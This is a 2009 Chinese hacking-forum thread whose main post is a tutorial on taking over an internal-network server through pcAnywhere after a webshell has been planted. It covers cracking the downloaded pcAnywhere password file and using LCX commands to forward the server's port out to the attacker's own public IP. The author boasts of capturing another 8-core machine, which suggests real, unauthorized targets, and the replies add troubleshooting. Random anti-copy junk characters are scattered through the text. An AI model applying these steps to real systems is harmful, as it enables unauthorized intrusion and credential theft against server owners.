Board logo

标题: [原创文章] pcanywhere之内网提权 [打印本页]

作者: huar    时间: 2009-7-5 21:35     标题: pcanywhere之内网提权

很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。. ~0 [! O/ a7 `- U

5 n9 b; ^' C4 D2 n& V( T: m提权方法:pcanywhere+LCX4 J) Z- b- S5 M* n0 B) @* Y
' t* [9 J+ S1 K: P
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。1 b& y+ H9 @1 l1 N' o$ Z

. m4 k- W2 [! H" V( k2 O* n在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。  s4 K/ a" [3 z9 g2 G/ ^: g

5 h& h# Y% H" g# R7 g: a[attach]1548[/attach]* p# a! _$ H% [$ Z
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
6 }1 O$ F8 b0 Y: U& L
" W( c; j6 w; X  x$ e. w4 t3 ?. W[attach]1549[/attach]' t/ f) l8 B( D- f( A$ f
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。7 p  l0 X) C2 p- m
5 A. [6 B' }  l2 S7 q
[attach]1550[/attach]( ?1 }: \9 j$ d; f
$ N  M& q+ F0 `2 @6 {" e/ x1 |
[attach]1551[/attach]
6 r! [; ?, A* o由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
( ^% f. S1 M, d) l+ `( N! P& h
& a1 Q& g1 C- H2 o/ e[attach]1552[/attach]; \0 h- r5 F* Y$ d' Y
LCX的用法再简单说下:
' B5 \$ k; L, Y  n9 e2 F+ R7 _
- v5 K2 b+ v) _* G; c服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)6 ~' B; [: m. L  `

# I+ y0 W- w7 q8 _本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
) G! F# H6 l' t/ U; _/ g. T) p2 g- {: }, c2 i/ H' x: c6 N
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。' _( Z: }1 U/ Z% |$ Z9 e# i+ Y
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
5 a- R+ D% c# A) A& J: Y- N1 s
2 C* O. R, U' t, c. M[attach]1553[/attach]
7 X. j- I+ {* h5 a$ }0 ?
8 L% f5 ]6 Y/ h- f: @) F[attach]1554[/attach]
; I5 O0 _1 J& z2 ?0 m" J呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。% I9 U+ s3 y' q( S0 w

; O1 f3 g0 c& {4 r4 |  S[attach]1555[/attach]! r  }$ u* G9 g& p* x' Q
3 B) o2 p, _* I5 P' i
[attach]1556[/attach]
9 G# B9 c. b) u4 J$ I7 o1 ~/ d" q3 I8 d我们本地连接试试,输入我们刚破解的账号密码1 z8 A* Y( M' m7 V' b: C* L( R

2 I, _  h/ s8 c9 ?8 K$ Y, k[attach]1557[/attach]/ U. x  D3 ?+ {: i% H
呵呵``连接成功,服务器不错,又一个8核^︵^
$ N1 e& T$ G, c" J5 @
4 D8 o! }$ ^( ]7 s% D# m* x4 e' i. J[attach]1558[/attach]
6 a  v9 i1 @$ k- A0 y" R/ q$ y6 s8 k9 Q* U$ ^! U9 Z9 r
[attach]1559[/attach]
作者: 柔肠寸断    时间: 2009-7-5 21:37

不错不错。。。你的貌似一直都是内网服务器哈
作者: huar    时间: 2009-7-5 21:41

哎。。。。运气不佳```老碰见内网的。。。。
作者: gassiori    时间: 2009-7-6 09:50

八核的哟
作者: 柔肠寸断    时间: 2009-12-15 15:36

顶起。。。。。。。。。
作者: killadmin    时间: 2010-1-21 20:01

但是我反弹后连接总是不成功,试着转发5632,5631一起,还是不行.




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2